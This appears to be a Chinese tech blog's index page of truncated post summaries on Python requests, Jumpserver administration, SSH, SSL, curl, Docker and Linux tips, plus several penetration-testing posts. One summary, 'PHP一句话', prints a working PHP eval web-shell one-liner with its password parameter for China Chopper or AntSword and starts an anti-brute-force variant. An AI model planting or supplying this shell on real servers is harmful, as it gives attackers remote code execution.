摘要:
1、模块说明 requests是使用Apache2 licensed 许可证的HTTP库。 用python编写。 比urllib2模块更简洁。 Request支持HTTP连接保持和连接池,支持使用cookie保持会话,支持文件上传,支持自动响应内容的编码,支持国际化的URL和POST数据自动编码。 阅读全文
摘要:
用户管理 一、用户列表 1.1 创建用户 点击页面左侧"用户列表"菜单下的"用户列表", 进入用户列表页面。 点击页面左上角"创建用户"按钮, 进入创建用户页面, 填写账户, 角色安全, 个人等信息。 其中, 用户名即 Jumpserver 登录账号。用户是用于资产授权, 当某个资产对一个用户授权后 阅读全文
摘要:
vulstudy是专门收集当下流行的漏洞学习平台,并将其制作成docker镜像,方便大家快速搭建环境,节省搭建时间,专注于的漏洞学习上,GitHub地址:https://github.com/c0ny1/vulstudy。 目前vulstudy包含以下漏洞学习平台: 序号漏洞平台包含漏洞作者语言 1 阅读全文
摘要:
1、下载Hackbar插件:https://github.com/Mr-xn/hackbar2.1.3 , 下载对应版本的zip。 2、打开谷歌浏览器右上角的三个点点,点击里面的更多工具,找到扩展程序,把下载的压缩包直接拖入里面即可(注意不用解压)。此处显示错误,忽略即可。 3、找到里面的加载来源, 阅读全文
摘要:
文件操作创建文件"asdf.txt" open( ) # 打开 file # 文件的位置(路径) mode # 操作文件的模式 encoding # 文件编码方式 f # 文件句柄 f = open("asdf",mode="r",encoding="utf-8") print(f.read()) 阅读全文
摘要:
PHP一句话: 1、普通一句话: <?php @eval($_POST[123456]); ?> *post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码 2、防爆破一句话: <?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST[ 阅读全文
摘要:
1. 前言 EVPN全称是Ethernet Virtual Private Network,由RFC7432(BGP MPLS-Based Ethernet VPN)定义。从名字上看,这是一个基于BGP和MPLS的L2 VPN。虽然这是一个2015年才有编号的RFC,但当它还是草案时,很多厂商已经开 阅读全文
摘要:
curl是一个非常实用的、用来与服务器之间传输数据的工具;支持的协议包括 (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, 阅读全文
摘要:
1、单向认证和双向认证 单向认证 SSL 协议的具体过程 ①客户端的浏览器向服务器传送客户端 SSL 协议的版本号,加密算法的种类,产生的随机数,以及其他服务器和客户端之间通讯所需要的各种信息。 ②服务器向客户端传送 SSL 协议的版本号,加密算法的种类,随机数以及其他相关信息,同时服务器还将向客户 阅读全文
摘要:
Mac系统下的工具整合,记得安装brew哦 信息收集工具 工具名称安装命令 CeWL brew install sidaf/pentest/cewl dirb brew install sidaf/pentest/dirb dnsrecon brew install sidaf/pentest/dn 阅读全文
摘要:
前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 M 阅读全文
摘要:
安装要求 服务器 CPU 2核或以上。 内存 1 GB或以上。 存储 1 GB或以上。 网络 自动更新需要公网权限,也可以使用离线更新。 域名 专用域名。 数据库 PostgreSQL 9.5或以上(推荐)。 Node.js Node.js 10.12或者以上。 浏览器 支持多数浏览器,如:Goog 阅读全文
摘要:
如果你在配置git仓库或者通过秘钥登陆其他系统出现如下报错: Permissions 0644 for '/Users/xxx/.ssh/id_rsa' are too open 使用命令改变一下私钥的权限 chmod 400 ~/.ssh/id_rsa 在重新测试一下即可 阅读全文
摘要:
forfiles命令选择一个或多个文件,并对它们执行另一个命令。 它可以选择文件的标准,包括文件名和修改时间。 它可以在命令行中使用,也可以作为批处理作业的一部分。 FORFILES [/P pathname] [/M searchmask] [/S] [/C command] [/D [+ | - 阅读全文
摘要:
漏洞扫描-AWVS-Nessus-Docker版/Docker源长期及时更新,感谢雷石安全实验室。 在docker仓库已经打包好2个扫描器,分别是awvs13和nessus,供广大兄弟们使用。 1 # 拉取镜像 2 docker pull leishianquan/awvs-nessus:v2 3 阅读全文
摘要:
Linux系统 1 1. 安装/升级Docker客户端 2 推荐安装1.10.0以上版本的Docker客户端,参考文档 docker-ce 3 4 2. 配置镜像加速器 5 针对Docker客户端版本大于 1.10.0 的用户 6 7 您可以通过修改daemon配置文件/etc/docker/dae 阅读全文
摘要:
简名 全名 中文 作用 atime Access Time 访问时间 最后一次访问文件(读取或执行)的时间 ctime Change Time 变化时间 最后一次改变文件(属性或权限)或者目录(属性或权限)的时间 mtime Modify Time 修改时间 最后一次修改文件(内容)或者目录(内容) 阅读全文
摘要:
某些厂商的Web应用防火墙或高防IP生成的CNAME域名是用于DNS解析的,不能直接访问。原因为厂商在WAF上做了限制,原本是可以访问的,限制后如果直接访问CNAME域名,可能显示504页面,或者本帮助页面。 阅读全文
摘要:
如果你留意Windows系统的安全日志,在那些事件描述中你将会发现里面的“登录类型”并非全部相同,难道除了在键盘上进行交互式登录(登录类型1)之外还有其它类型吗?不错,Windows为了让你从日志中获得更多有价值的信息,它细分了很多种登录类型,以便让你区分登录者到底是从本地登录,还是从网络登录,以及 阅读全文
摘要:
内容简介:我们经常会使用我们也明白这是使用了SSH协议进行登陆,但我们想知道的是,为什么可以使用SSH协议进行登陆,而且为什么使用SSH就是安全的,其背后的原理是什么?下面我们就一起来探讨下这几个话题。 本文转载自:https://juejin.im/post/5baaf517e51d453df04 阅读全文
摘要:
一、系统设置 1.1 基本设置 # 修改 url 的"localhost"为你的实际 url 地址, 否则邮件收到的地址将为"localhost" 也无法创建新用户#修改完 url 地址后需要重启 jumpserver 服务(重启才能生效,后续会解决这个问题) 1.2 邮件设置 # 点击页面上边的" 阅读全文
摘要:
安装完LINUX后经常使用终端远程登录,登录后经常出现”You have new mail in /var/spool/mail/root”的提示,这东西到底是做什么用的呢?这是LINUX的邮件提示功能。LINUX会定时查看系统各种状态做汇总,每经过一段时间会把汇总的信息发送的root的邮箱里。 1 阅读全文
摘要:
1、RDP 协议资产连接说明 RDP 协议资产连接错误排查思路 (1). 如果白屏 检查nginx配置文件的guacamole设置ip是否正确, 检查终端管理的gua状态是否在线 (2). 如果显示没有权限 是你 终端管理里 guacamole 状态为红色或者没有注册成功 (3). 如果显示未知问题 阅读全文
摘要:
1、安装过程中常见的问题 git clone 提示 ssl 错误 # 一般是由于时间不同步, 或者网络有问题导致的 # 可以尝试下载 releases 包 pip install 提示 ssl 错误 # 参考第一条解决 pip install 提示 download 错误 # 一般是由于网络不好, 阅读全文
摘要:
1、MFA 使用说明 Multi-Factor Authentication (MFA) 遵循基于时间的一次性密码 (TOTP) 标准 (RFC 6238) # 关闭也是在这里, 点击此处的重置即可 # 部分安卓手机无法使用 Google Authenticator, 可以尝试使用系统自带的【扫一扫 阅读全文
摘要:
系统是Centos7,在登陆界面,输入完用户名敲回车后,没有提示我输入密码,就直接报“Login incorrect”了: CentOS Linux 7 (core) Kernel 3.10.0-327.eel7.x86_64 on an x86_64 localhost login:root Lo 阅读全文
摘要:
Linux中当新建用户时,每个用户都会默认有自己的环境变量,可以通过修改环境变量配置文件进行修改,在使用普通用户登录linux主机的时候出现主机名变成-bash-4.2,命令不可用的情况,希望本篇经验可以帮助到你。 步骤一:使用weblogic用户登录linux主机,发现主机名显示为-bash-4. 阅读全文
摘要:
安装完之后就是接下来需要环境变量配置。 1、打开路径:此电脑 (右键) 属性 高级系统设置 环境变量 2、配置JAVA_HOME 点击系统变量中的新建,在变量名中键入JAVA_HOME,在变量值中填写jdk的安装路径,例如下图: 3、配置Path: 选择Path,点击【编辑】,在弹出来的页面中点击【 阅读全文